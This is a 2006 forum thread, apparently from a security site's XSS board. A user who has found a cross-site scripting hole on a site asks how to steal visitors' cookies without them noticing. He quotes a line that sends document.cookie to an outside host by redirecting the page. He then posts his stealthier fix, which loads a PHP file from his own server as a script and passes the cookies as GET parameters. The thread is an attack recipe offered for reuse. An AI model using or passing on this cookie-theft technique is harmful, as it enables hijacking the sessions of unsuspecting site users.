|
|
|
|
Menu |
|
|
Home |
| |
|
Discussions |
| |
|
Tools |
| |
|
Affiliates |
| |
|
Content |
| |
|
Info |
| | |
|
|
|
|
|
User Info |
|
Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 80
Members: 0
Total: 80
|
|
|
|
|
|
Full disclosure |
|
|
|
|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
tiny help please |
|
Posted: Thu Oct 05, 2006 10:36 am |
|
|
716 |
Regular user |
|
|
Joined: Feb 11, 2006 |
Posts: 19 |
|
|
|
|
|
|
|
i found an XSS on a site and since its (trying to be ) my first XSS attack, i'd like to ask smth: how can i send the cookie to myself without the user noticing that smth unusual is happening...
i dont wanna use document.location = "http://www.somesite.com/" + document.cookie because it would redirect them, which would make them notice... i gave a try to AJAX, but its so hard and it doesnt want to work
so is there any typical solution for this?
thank you very much in advance! |
|
|
|
|
|
|
|
|
Posted: Fri Oct 06, 2006 10:19 am |
|
|
716 |
Regular user |
|
|
Joined: Feb 11, 2006 |
Posts: 19 |
|
|
|
|
|
|
|
ok, i got a solution after trin harder than i could imagine, so i'll post it here in case someone needs it
foa: i tried ajax (really cute thing btw) but it wont allow to send datas to another server than the current one (which i cant control of course) - i know it depeds on the browser security setting, but most of ppl have default security, which wont allow sending datas to another server...
so then, what i did was: i requested a PHP file as JS from my server and passed as GET params the cookie values (i also had to do some string modification in JS so that my php gets the cookie as: my.php?var=value&anothervar=anothervalue&andso=on
hopefully someone who has similar problems can find this
cheers |
|
|
|
|
|
www.waraxe.us Forum Index -> Cross-site scripting aka XSS
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|
|